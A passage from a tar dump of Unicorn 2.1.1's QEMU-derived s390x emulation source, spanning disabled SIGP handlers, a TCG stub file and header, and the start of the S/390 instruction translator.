= addr; tlb_flush(cs); // cpu_synchronize_post_init(cs); si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; } #endif // static void sigp_cond_emergency(S390CPU *src_cpu, S390CPU *dst_cpu, // SigpInfo *si) // { // const uint64_t psw_int_mask = PSW_MASK_IO | PSW_MASK_EXT; // uint16_t p_asn, s_asn, asn; // uint64_t psw_addr, psw_mask; // bool idle; // /* this looks racy, but these values are only used when STOPPED */ // idle = CPU(dst_cpu)->halted; // psw_addr = dst_cpu->env.psw.addr; // psw_mask = dst_cpu->env.psw.mask; // asn = si->param; // p_asn = dst_cpu->env.cregs[4] & 0xffff; /* Primary ASN */ // s_asn = dst_cpu->env.cregs[3] & 0xffff; /* Secondary ASN */ // if (s390_cpu_get_state(dst_cpu) != S390_CPU_STATE_STOPPED || // (psw_mask & psw_int_mask) != psw_int_mask || // (idle && psw_addr != 0) || // (!idle && (asn == p_asn || asn == s_asn))) { // cpu_inject_emergency_signal(dst_cpu, src_cpu->env.core_id); // } else { // set_sigp_status(si, SIGP_STAT_INCORRECT_STATE); // } // si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; // } // static void sigp_sense_running(S390CPU *dst_cpu, SigpInfo *si) // { // /* sensing without locks is racy, but it's the same for real hw */ // //if (!s390_has_feat(S390_FEAT_SENSE_RUNNING_STATUS)) { // // set_sigp_status(si, SIGP_STAT_INVALID_ORDER); // // return; // //} // /* If halted (which includes also STOPPED), it is not running */ // if (CPU(dst_cpu)->halted) { // set_sigp_status(si, SIGP_STAT_NOT_RUNNING); // } else { // si->cc = SIGP_CC_ORDER_CODE_ACCEPTED; // } // } // static int handle_sigp_single_dst(S390CPU *cpu, S390CPU *dst_cpu, uint8_t order, // uint64_t param, uint64_t *status_reg) // { // SigpInfo si = { // .param = param, // .status_reg = status_reg, // }; // /* cpu available? */ // if (dst_cpu == NULL) { // return SIGP_CC_NOT_OPERATIONAL; // } // /* only resets can break pending orders */ // if (dst_cpu->env.sigp_order != 0 && // order != SIGP_CPU_RESET && // order != SIGP_INITIAL_CPU_RESET) { // return SIGP_CC_BUSY; // } // switch (order) { // case SIGP_SENSE: // sigp_sense(dst_cpu, &si); // break; // case SIGP_EXTERNAL_CALL: // sigp_external_call(cpu, dst_cpu, &si); // break; // case SIGP_EMERGENCY: // sigp_emergency(cpu, dst_cpu, &si); // break; // case SIGP_START: // //run_on_cpu(CPU(dst_cpu), sigp_start, RUN_ON_CPU_HOST_PTR(&si)); // break; // case SIGP_STOP: // //run_on_cpu(CPU(dst_cpu), sigp_stop, RUN_ON_CPU_HOST_PTR(&si)); // break; // case SIGP_RESTART: // //run_on_cpu(CPU(dst_cpu), sigp_restart, RUN_ON_CPU_HOST_PTR(&si)); // break; // case SIGP_STOP_STORE_STATUS: // //run_on_cpu(CPU(dst_cpu), sigp_stop_and_store_status, RUN_ON_CPU_HOST_PTR(&si)); // break; // case SIGP_STORE_STATUS_ADDR: // //run_on_cpu(CPU(dst_cpu), sigp_store_status_at_address, RUN_ON_CPU_HOST_PTR(&si)); // break; // case SIGP_STORE_ADTL_STATUS: // //run_on_cpu(CPU(dst_cpu), sigp_store_adtl_status, RUN_ON_CPU_HOST_PTR(&si)); // break; // case SIGP_SET_PREFIX: // //run_on_cpu(CPU(dst_cpu), sigp_set_prefix, RUN_ON_CPU_HOST_PTR(&si)); // break; // case SIGP_INITIAL_CPU_RESET: // //run_on_cpu(CPU(dst_cpu), sigp_initial_cpu_reset, RUN_ON_CPU_HOST_PTR(&si)); // break; // case SIGP_CPU_RESET: // //run_on_cpu(CPU(dst_cpu), sigp_cpu_reset, RUN_ON_CPU_HOST_PTR(&si)); // break; // case SIGP_COND_EMERGENCY: // sigp_cond_emergency(cpu, dst_cpu, &si); // break; // case SIGP_SENSE_RUNNING: // sigp_sense_running(dst_cpu, &si); // break; // default: // set_sigp_status(&si, SIGP_STAT_INVALID_ORDER); // } // return si.cc; // } // static int sigp_set_architecture(S390CPU *cpu, uint32_t param, // uint64_t *status_reg) // { // bool all_stopped = true; // #if 0 // CPU_FOREACH(cur_cs) { // cur_cpu = S390_CPU(cur_cs); // if (cur_cpu == cpu) { // continue; // } // if (s390_cpu_get_state(cur_cpu) != S390_CPU_STATE_STOPPED) { // all_stopped = false; // } // } // #endif // all_stopped = false; // *status_reg &= 0xffffffff00000000ULL; // /* Reject set arch order, with czam we're always in z/Arch mode. */ // *status_reg |= (all_stopped ? SIGP_STAT_INVALID_PARAMETER : // SIGP_STAT_INCORRECT_STATE); // return SIGP_CC_STATUS_STORED; // } #if 0 int handle_sigp(CPUS390XState *env, uint8_t order, uint64_t r1, uint64_t r3) { uint64_t *status_reg = &env->regs[r1]; uint64_t param = (r1 % 2) ? env->regs[r1] : env->regs[r1 + 1]; S390CPU *cpu = env_archcpu(env); S390CPU *dst_cpu = NULL; int ret; switch (order) { case SIGP_SET_ARCH: ret = sigp_set_architecture(cpu, param, status_reg); break; default: /* all other sigp orders target a single vcpu */ dst_cpu = s390_cpu_addr2state(env->regs[r3]); ret = handle_sigp_single_dst(cpu, dst_cpu, order, param, status_reg); } return ret; } #endif int s390_cpu_restart(S390CPU *cpu) { //SigpInfo si = {}; //run_on_cpu(CPU(cpu), sigp_restart, RUN_ON_CPU_HOST_PTR(&si)); return 0; } void do_stop_interrupt(CPUS390XState *env) { S390CPU *cpu = env_archcpu(env); if (s390_cpu_set_state(S390_CPU_STATE_STOPPED, cpu) == 0) { // qemu_system_shutdown_request(SHUTDOWN_CAUSE_GUEST_SHUTDOWN); } if (cpu->env.sigp_order == SIGP_STOP_STORE_STATUS) { s390_store_status(cpu, S390_STORE_STATUS_DEF_ADDR, true); } env->sigp_order = 0; env->pending_int &= ~INTERRUPT_STOP; } void s390_init_sigp(void) { } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/tcg-stub.c����������������������������������������������������������0000664�0000000�0000000�00000000570�14675241067�0020225�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU TCG support -- s390x specific function stubs. * * Copyright (C) 2018 Red Hat Inc * * Authors: * David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include "qemu-common.h" #include "cpu.h" #include "tcg_s390x.h"����������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/tcg_s390x.h���������������������������������������������������������0000664�0000000�0000000�00000001475�14675241067�0020232�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU TCG support -- s390x specific functions. * * Copyright 2018 Red Hat, Inc. * * Authors: * David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef TCG_S390X_H #define TCG_S390X_H void tcg_s390_tod_updated(CPUState *cs, run_on_cpu_data opaque); void QEMU_NORETURN tcg_s390_program_interrupt(CPUS390XState *env, uint32_t code, uintptr_t ra); void QEMU_NORETURN tcg_s390_data_exception(CPUS390XState *env, uint32_t dxc, uintptr_t ra); void QEMU_NORETURN tcg_s390_vector_exception(CPUS390XState *env, uint32_t vxc, uintptr_t ra); #endif /* TCG_S390X_H */ ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/translate.c���������������������������������������������������������0000664�0000000�0000000�00000632113�14675241067�0020476�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * S/390 translation * * Copyright (c) 2009 Ulrich Hecht * Copyright (c) 2010 Alexander Graf * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* #define DEBUG_INLINE_BRANCHES */ #define S390X_DEBUG_DISAS /* #define S390X_DEBUG_DISAS_VERBOSE */ #ifdef S390X_DEBUG_DISAS_VERBOSE # define LOG_DISAS(...) qemu_log(__VA_ARGS__) #else # define LOG_DISAS(...) do { } while (0) #endif #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "exec/exec-all.h" #include "tcg/tcg-op.h" #include "tcg/tcg-op-gvec.h" #include "qemu/log.h" #include "qemu/host-utils.h" #include "exec/cpu_ldst.h" #include "exec/gen-icount.h" #include "exec/helper-proto.h" #include "exec/helper-gen.h" #include "exec/translator.h" #include "qemu/atomic128.h" /* Information that (most) every instruction needs to manipulate. */ typedef struct DisasContext DisasContext; typedef struct DisasInsn DisasInsn; typedef struct DisasFields DisasFields; /* * Define a structure to hold the decoded fields. We'll store each inside * an array indexed by an enum. In order to conserve memory, we'll arrange * for fields that do not exist at the same time to overlap, thus the "C" * for compact. For checking purposes there is an "O" for original index * as well that will be applied to availability bitmaps. */ enum DisasFieldIndexO { FLD_O_r1, FLD_O_r2, FLD_O_r3, FLD_O_m1, FLD_O_m3, FLD_O_m4, FLD_O_m5, FLD_O_m6, FLD_O_b1, FLD_O_b2, FLD_O_b4, FLD_O_d1, FLD_O_d2, FLD_O_d4, FLD_O_x2, FLD_O_l1, FLD_O_l2, FLD_O_i1, FLD_O_i2, FLD_O_i3, FLD_O_i4, FLD_O_i5, FLD_O_v1, FLD_O_v2, FLD_O_v3, FLD_O_v4, }; enum DisasFieldIndexC { FLD_C_r1 = 0, FLD_C_m1 = 0, FLD_C_b1 = 0, FLD_C_i1 = 0, FLD_C_v1 = 0, FLD_C_r2 = 1, FLD_C_b2 = 1, FLD_C_i2 = 1, FLD_C_r3 = 2, FLD_C_m3 = 2, FLD_C_i3 = 2, FLD_C_v3 = 2, FLD_C_m4 = 3, FLD_C_b4 = 3, FLD_C_i4 = 3, FLD_C_l1 = 3, FLD_C_v4 = 3, FLD_C_i5 = 4, FLD_C_d1 = 4, FLD_C_m5 = 4, FLD_C_d2 = 5, FLD_C_m6 = 5, FLD_C_d4 = 6, FLD_C_x2 = 6, FLD_C_l2 = 6, FLD_C_v2 = 6, NUM_C_FIELD = 7 }; struct DisasFields { uint64_t raw_insn; unsigned op:8; unsigned op2:8; unsigned presentC:16; unsigned int presentO; int c[NUM_C_FIELD]; }; struct DisasContext { DisasContextBase base; const DisasInsn *insn; DisasFields fields; uint64_t ex_value; /* * During translate_one(), pc_tmp is used to determine the instruction * to be executed after base.pc_next - e.g. next sequential instruction * or a branch target. */ uint64_t pc_tmp; uint32_t ilen; enum cc_op cc_op; bool do_debug; // Unicorn struct uc_struct *uc; }; /* Information carried about a condition to be evaluated. */ typedef struct { TCGCond cond:8; bool is_64; bool g1; bool g2; union { struct { TCGv_i64 a, b; } s64; struct { TCGv_i32 a, b; } s32; } u; } DisasCompare; #ifdef DEBUG_INLINE_BRANCHES static uint64_t inline_branch_hit[CC_OP_MAX]; static uint64_t inline_branch_miss[CC_OP_MAX]; #endif static void pc_to_link_info(TCGContext *tcg_ctx, TCGv_i64 out, DisasContext *s, uint64_t pc) { TCGv_i64 tmp; if (s->base.tb->flags & FLAG_MASK_32) { if (s->base.tb->flags & FLAG_MASK_64) { tcg_gen_movi_i64(tcg_ctx, out, pc); return; } pc |= 0x80000000; } assert(!(s->base.tb->flags & FLAG_MASK_64)); tmp = tcg_const_i64(tcg_ctx, pc); tcg_gen_deposit_i64(tcg_ctx, out, out, tmp, 0, 32); tcg_temp_free_i64(tcg_ctx, tmp); } void s390x_translate_init(struct uc_struct *uc) { TCGContext *tcg_ctx = uc->tcg_ctx; int i; tcg_ctx->psw_addr = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUS390XState, psw.addr), "psw_addr"); tcg_ctx->psw_mask = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUS390XState, psw.mask), "psw_mask"); tcg_ctx->gbea = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUS390XState, gbea), "gbea"); tcg_ctx->cc_op = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUS390XState, cc_op), "cc_op"); tcg_ctx->cc_src = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUS390XState, cc_src), "cc_src"); tcg_ctx->cc_dst = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUS390XState, cc_dst), "cc_dst"); tcg_ctx->cc_vr = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUS390XState, cc_vr), "cc_vr"); for (i = 0; i < 16; i++) { snprintf(tcg_ctx->s390x_cpu_reg_names[i], sizeof(tcg_ctx->s390x_cpu_reg_names[0]), "r%d", i); tcg_ctx->regs[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUS390XState, regs[i]), tcg_ctx->s390x_cpu_reg_names[i]); } } static inline int vec_full_reg_offset(uint8_t reg) { g_assert(reg < 32); return offsetof(CPUS390XState, vregs[reg][0]); } static inline int vec_reg_offset(uint8_t reg, uint8_t enr, MemOp es) { /* Convert element size (es) - e.g. MO_8 - to bytes */ const uint8_t bytes = 1 << es; int offs = enr * bytes; /* * vregs[n][0] is the lowest 8 byte and vregs[n][1] the highest 8 byte * of the 16 byte vector, on both, little and big endian systems. * * Big Endian (target/possible host) * B: [ 0][ 1][ 2][ 3][ 4][ 5][ 6][ 7] - [ 8][ 9][10][11][12][13][14][15] * HW: [ 0][ 1][ 2][ 3] - [ 4][ 5][ 6][ 7] * W: [ 0][ 1] - [ 2][ 3] * DW: [ 0] - [ 1] * * Little Endian (possible host) * B: [ 7][ 6][ 5][ 4][ 3][ 2][ 1][ 0] - [15][14][13][12][11][10][ 9][ 8] * HW: [ 3][ 2][ 1][ 0] - [ 7][ 6][ 5][ 4] * W: [ 1][ 0] - [ 3][ 2] * DW: [ 0] - [ 1] * * For 16 byte elements, the two 8 byte halves will not form a host * int128 if the host is little endian, since they're in the wrong order. * Some operations (e.g. xor) do not care. For operations like addition, * the two 8 byte elements have to be loaded separately. Let's force all * 16 byte operations to handle it in a special way. */ g_assert(es <= MO_64); #ifndef HOST_WORDS_BIGENDIAN offs ^= (8 - bytes); #endif return offs + vec_full_reg_offset(reg); } static inline int freg64_offset(uint8_t reg) { g_assert(reg < 16); return vec_reg_offset(reg, 0, MO_64); } static inline int freg32_offset(uint8_t reg) { g_assert(reg < 16); return vec_reg_offset(reg, 0, MO_32); } static TCGv_i64 load_reg(TCGContext *tcg_ctx, int reg) { TCGv_i64 r = tcg_temp_new_i64(tcg_ctx); tcg_gen_mov_i64(tcg_ctx, r, tcg_ctx->regs[reg]); return r; } static TCGv_i64 load_freg(TCGContext *tcg_ctx, int reg) { TCGv_i64 r = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, r, tcg_ctx->cpu_env, freg64_offset(reg)); return r; } static TCGv_i64 load_freg32_i64(TCGContext *tcg_ctx, int reg) { TCGv_i64 r = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld32u_i64(tcg_ctx, r, tcg_ctx->cpu_env, freg32_offset(reg)); return r; } static void store_reg(TCGContext *tcg_ctx, int reg, TCGv_i64 v) { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->regs[reg], v); } static void store_freg(TCGContext *tcg_ctx, int reg, TCGv_i64 v) { tcg_gen_st_i64(tcg_ctx, v, tcg_ctx->cpu_env, freg64_offset(reg)); } static void store_reg32_i64(TCGContext *tcg_ctx, int reg, TCGv_i64 v) { /* 32 bit register writes keep the upper half */ tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->regs[reg], tcg_ctx->regs[reg], v, 0, 32); } static void store_reg32h_i64(TCGContext *tcg_ctx, int reg, TCGv_i64 v) { tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->regs[reg], tcg_ctx->regs[reg], v, 32, 32); } static void store_freg32_i64(TCGContext *tcg_ctx, int reg, TCGv_i64 v) { tcg_gen_st32_i64(tcg_ctx, v, tcg_ctx->cpu_env, freg32_offset(reg)); } static void return_low128(TCGContext *tcg_ctx, TCGv_i64 dest) { tcg_gen_ld_i64(tcg_ctx, dest, tcg_ctx->cpu_env, offsetof(CPUS390XState, retxl)); } static void update_psw_addr(DisasContext *s) { /* psw.addr */ TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_i64(tcg_ctx, tcg_ctx->psw_addr, s->base.pc_next); } static void per_branch(DisasContext *s, bool to_next) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_i64(tcg_ctx, tcg_ctx->gbea, s->base.pc_next); if (s->base.tb->flags & FLAG_MASK_PER) { TCGv_i64 next_pc = to_next ? tcg_const_i64(tcg_ctx, s->pc_tmp) : tcg_ctx->psw_addr; gen_helper_per_branch(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->gbea, next_pc); if (to_next) { tcg_temp_free_i64(tcg_ctx, next_pc); } } } static void per_branch_cond(DisasContext *s, TCGCond cond, TCGv_i64 arg1, TCGv_i64 arg2) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (s->base.tb->flags & FLAG_MASK_PER) { TCGLabel *lab = gen_new_label(tcg_ctx); tcg_gen_brcond_i64(tcg_ctx, tcg_invert_cond(cond), arg1, arg2, lab); tcg_gen_movi_i64(tcg_ctx, tcg_ctx->gbea, s->base.pc_next); gen_helper_per_branch(tcg_ctx, tcg_ctx->cpu_env, tcg_ctx->gbea, tcg_ctx->psw_addr); gen_set_label(tcg_ctx, lab); } else { TCGv_i64 pc = tcg_const_i64(tcg_ctx, s->base.pc_next); tcg_gen_movcond_i64(tcg_ctx, cond, tcg_ctx->gbea, arg1, arg2, tcg_ctx->gbea, pc); tcg_temp_free_i64(tcg_ctx, pc); } } static void per_breaking_event(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_i64(tcg_ctx, tcg_ctx->gbea, s->base.pc_next); } static void update_cc_op(DisasContext *s) { if (s->cc_op != CC_OP_DYNAMIC && s->cc_op != CC_OP_STATIC) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cc_op, s->cc_op); } } static inline uint64_t ld_code2(CPUS390XState *env, uint64_t pc) { return (uint64_t)cpu_lduw_code(env, pc); } static inline uint64_t ld_code4(CPUS390XState *env, uint64_t pc) { return (uint64_t)(uint32_t)cpu_ldl_code(env, pc); } static int get_mem_index(DisasContext *s) { if (!(s->base.tb->flags & FLAG_MASK_DAT)) { return MMU_REAL_IDX; } switch (s->base.tb->flags & FLAG_MASK_ASC) { case PSW_ASC_PRIMARY >> FLAG_MASK_PSW_SHIFT: return MMU_PRIMARY_IDX; case PSW_ASC_SECONDARY >> FLAG_MASK_PSW_SHIFT: return MMU_SECONDARY_IDX; case PSW_ASC_HOME >> FLAG_MASK_PSW_SHIFT: return MMU_HOME_IDX; default: tcg_abort(); break; } } static void gen_exception(TCGContext *tcg_ctx, int excp) { TCGv_i32 tmp = tcg_const_i32(tcg_ctx, excp); gen_helper_exception(tcg_ctx, tcg_ctx->cpu_env, tmp); tcg_temp_free_i32(tcg_ctx, tmp); } static void gen_program_exception(DisasContext *s, int code) { TCGv_i32 tmp; TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Remember what pgm exeption this was. */ tmp = tcg_const_i32(tcg_ctx, code); tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUS390XState, int_pgm_code)); tcg_temp_free_i32(tcg_ctx, tmp); tmp = tcg_const_i32(tcg_ctx, s->ilen); tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUS390XState, int_pgm_ilen)); tcg_temp_free_i32(tcg_ctx, tmp); /* update the psw */ update_psw_addr(s); /* Save off cc. */ update_cc_op(s); /* Trigger exception. */ gen_exception(tcg_ctx, EXCP_PGM); } static inline void gen_illegal_opcode(DisasContext *s) { gen_program_exception(s, PGM_OPERATION); } static inline void gen_data_exception(TCGContext *tcg_ctx, uint8_t dxc) { TCGv_i32 tmp = tcg_const_i32(tcg_ctx, dxc); gen_helper_data_exception(tcg_ctx, tcg_ctx->cpu_env, tmp); tcg_temp_free_i32(tcg_ctx, tmp); } static inline void gen_trap(DisasContext *s) { /* Set DXC to 0xff */ gen_data_exception(s->uc->tcg_ctx, 0xff); } static void gen_addi_and_wrap_i64(DisasContext *s, TCGv_i64 dst, TCGv_i64 src, int64_t imm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_addi_i64(tcg_ctx, dst, src, imm); if (!(s->base.tb->flags & FLAG_MASK_64)) { if (s->base.tb->flags & FLAG_MASK_32) { tcg_gen_andi_i64(tcg_ctx, dst, dst, 0x7fffffff); } else { tcg_gen_andi_i64(tcg_ctx, dst, dst, 0x00ffffff); } } } static TCGv_i64 get_address(DisasContext *s, int x2, int b2, int d2) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); /* * Note that d2 is limited to 20 bits, signed. If we crop negative * displacements early we create larger immedate addends. */ if (b2 && x2) { tcg_gen_add_i64(tcg_ctx, tmp, tcg_ctx->regs[b2], tcg_ctx->regs[x2]); gen_addi_and_wrap_i64(s, tmp, tmp, d2); } else if (b2) { gen_addi_and_wrap_i64(s, tmp, tcg_ctx->regs[b2], d2); } else if (x2) { gen_addi_and_wrap_i64(s, tmp, tcg_ctx->regs[x2], d2); } else if (!(s->base.tb->flags & FLAG_MASK_64)) { if (s->base.tb->flags & FLAG_MASK_32) { tcg_gen_movi_i64(tcg_ctx, tmp, d2 & 0x7fffffff); } else { tcg_gen_movi_i64(tcg_ctx, tmp, d2 & 0x00ffffff); } } else { tcg_gen_movi_i64(tcg_ctx, tmp, d2); } return tmp; } static inline bool live_cc_data(DisasContext *s) { return (s->cc_op != CC_OP_DYNAMIC && s->cc_op != CC_OP_STATIC && s->cc_op > 3); } static inline void gen_op_movi_cc(DisasContext *s, uint32_t val) { if (live_cc_data(s)) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_discard_i64(tcg_ctx, tcg_ctx->cc_src); tcg_gen_discard_i64(tcg_ctx, tcg_ctx->cc_dst); tcg_gen_discard_i64(tcg_ctx, tcg_ctx->cc_vr); } s->cc_op = CC_OP_CONST0 + val; } static void gen_op_update1_cc_i64(DisasContext *s, enum cc_op op, TCGv_i64 dst) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (live_cc_data(s)) { tcg_gen_discard_i64(tcg_ctx, tcg_ctx->cc_src); tcg_gen_discard_i64(tcg_ctx, tcg_ctx->cc_vr); } tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cc_dst, dst); s->cc_op = op; } static void gen_op_update2_cc_i64(DisasContext *s, enum cc_op op, TCGv_i64 src, TCGv_i64 dst) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (live_cc_data(s)) { tcg_gen_discard_i64(tcg_ctx, tcg_ctx->cc_vr); } tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cc_src, src); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cc_dst, dst); s->cc_op = op; } static void gen_op_update3_cc_i64(DisasContext *s, enum cc_op op, TCGv_i64 src, TCGv_i64 dst, TCGv_i64 vr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cc_src, src); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cc_dst, dst); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cc_vr, vr); s->cc_op = op; } static void set_cc_nz_u64(DisasContext *s, TCGv_i64 val) { gen_op_update1_cc_i64(s, CC_OP_NZ, val); } static void gen_set_cc_nz_f32(DisasContext *s, TCGv_i64 val) { gen_op_update1_cc_i64(s, CC_OP_NZ_F32, val); } static void gen_set_cc_nz_f64(DisasContext *s, TCGv_i64 val) { gen_op_update1_cc_i64(s, CC_OP_NZ_F64, val); } static void gen_set_cc_nz_f128(DisasContext *s, TCGv_i64 vh, TCGv_i64 vl) { gen_op_update2_cc_i64(s, CC_OP_NZ_F128, vh, vl); } /* CC value is in env->cc_op */ static void set_cc_static(DisasContext *s) { if (live_cc_data(s)) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_discard_i64(tcg_ctx, tcg_ctx->cc_src); tcg_gen_discard_i64(tcg_ctx, tcg_ctx->cc_dst); tcg_gen_discard_i64(tcg_ctx, tcg_ctx->cc_vr); } s->cc_op = CC_OP_STATIC; } /* calculates cc into cc_op */ static void gen_op_calc_cc(DisasContext *s) { TCGv_i32 local_cc_op = NULL; TCGv_i64 dummy = NULL; TCGContext *tcg_ctx = s->uc->tcg_ctx; switch (s->cc_op) { default: dummy = tcg_const_i64(tcg_ctx, 0); /* FALLTHRU */ case CC_OP_ADD_64: case CC_OP_ADDU_64: case CC_OP_ADDC_64: case CC_OP_SUB_64: case CC_OP_SUBU_64: case CC_OP_SUBB_64: case CC_OP_ADD_32: case CC_OP_ADDU_32: case CC_OP_ADDC_32: case CC_OP_SUB_32: case CC_OP_SUBU_32: case CC_OP_SUBB_32: local_cc_op = tcg_const_i32(tcg_ctx, s->cc_op); break; case CC_OP_CONST0: case CC_OP_CONST1: case CC_OP_CONST2: case CC_OP_CONST3: case CC_OP_STATIC: case CC_OP_DYNAMIC: break; } switch (s->cc_op) { case CC_OP_CONST0: case CC_OP_CONST1: case CC_OP_CONST2: case CC_OP_CONST3: /* s->cc_op is the cc value */ tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cc_op, s->cc_op - CC_OP_CONST0); break; case CC_OP_STATIC: /* env->cc_op already is the cc value */ break; case CC_OP_NZ: case CC_OP_ABS_64: case CC_OP_NABS_64: case CC_OP_ABS_32: case CC_OP_NABS_32: case CC_OP_LTGT0_32: case CC_OP_LTGT0_64: case CC_OP_COMP_32: case CC_OP_COMP_64: case CC_OP_NZ_F32: case CC_OP_NZ_F64: case CC_OP_FLOGR: case CC_OP_LCBB: /* 1 argument */ gen_helper_calc_cc(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, local_cc_op, dummy, tcg_ctx->cc_dst, dummy); break; case CC_OP_ICM: case CC_OP_LTGT_32: case CC_OP_LTGT_64: case CC_OP_LTUGTU_32: case CC_OP_LTUGTU_64: case CC_OP_TM_32: case CC_OP_TM_64: case CC_OP_SLA: case CC_OP_NZ_F128: case CC_OP_VC: /* 2 arguments */ gen_helper_calc_cc(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, local_cc_op, tcg_ctx->cc_src, tcg_ctx->cc_dst, dummy); break; case CC_OP_ADD_64: case CC_OP_ADDU_64: case CC_OP_ADDC_64: case CC_OP_SUB_64: case CC_OP_SUBU_64: case CC_OP_SUBB_64: case CC_OP_ADD_32: case CC_OP_ADDU_32: case CC_OP_ADDC_32: case CC_OP_SUB_32: case CC_OP_SUBU_32: case CC_OP_SUBB_32: /* 3 arguments */ gen_helper_calc_cc(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, local_cc_op, tcg_ctx->cc_src, tcg_ctx->cc_dst, tcg_ctx->cc_vr); break; case CC_OP_DYNAMIC: /* unknown operation - assume 3 arguments and cc_op in env */ gen_helper_calc_cc(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, tcg_ctx->cc_op, tcg_ctx->cc_src, tcg_ctx->cc_dst, tcg_ctx->cc_vr); break; default: tcg_abort(); } if (local_cc_op) { tcg_temp_free_i32(tcg_ctx, local_cc_op); } if (dummy) { tcg_temp_free_i64(tcg_ctx, dummy); } /* We now have cc in cc_op as constant */ set_cc_static(s); } static bool use_exit_tb(DisasContext *s) { return s->base.singlestep_enabled || (tb_cflags(s->base.tb) & CF_LAST_IO) || (s->base.tb->flags & FLAG_MASK_PER); } static bool use_goto_tb(DisasContext *s, uint64_t dest) { if (unlikely(use_exit_tb(s))) { return false; } return (dest & TARGET_PAGE_MASK) == (s->base.tb->pc & TARGET_PAGE_MASK) || (dest & TARGET_PAGE_MASK) == (s->base.pc_next & TARGET_PAGE_MASK); } static void account_noninline_branch(DisasContext *s, int cc_op) { #ifdef DEBUG_INLINE_BRANCHES inline_branch_miss[cc_op]++; #endif } static void account_inline_branch(DisasContext *s, int cc_op) { #ifdef DEBUG_INLINE_BRANCHES inline_branch_hit[cc_op]++; #endif } /* Table of mask values to comparison codes, given a comparison as input. For such, CC=3 should not be possible. */ static const TCGCond ltgt_cond[16] = { TCG_COND_NEVER, TCG_COND_NEVER, /* | | | x */ TCG_COND_GT, TCG_COND_GT, /* | | GT | x */ TCG_COND_LT, TCG_COND_LT, /* | LT | | x */ TCG_COND_NE, TCG_COND_NE, /* | LT | GT | x */ TCG_COND_EQ, TCG_COND_EQ, /* EQ | | | x */ TCG_COND_GE, TCG_COND_GE, /* EQ | | GT | x */ TCG_COND_LE, TCG_COND_LE, /* EQ | LT | | x */ TCG_COND_ALWAYS, TCG_COND_ALWAYS, /* EQ | LT | GT | x */ }; /* Table of mask values to comparison codes, given a logic op as input. For such, only CC=0 and CC=1 should be possible. */ static const TCGCond nz_cond[16] = 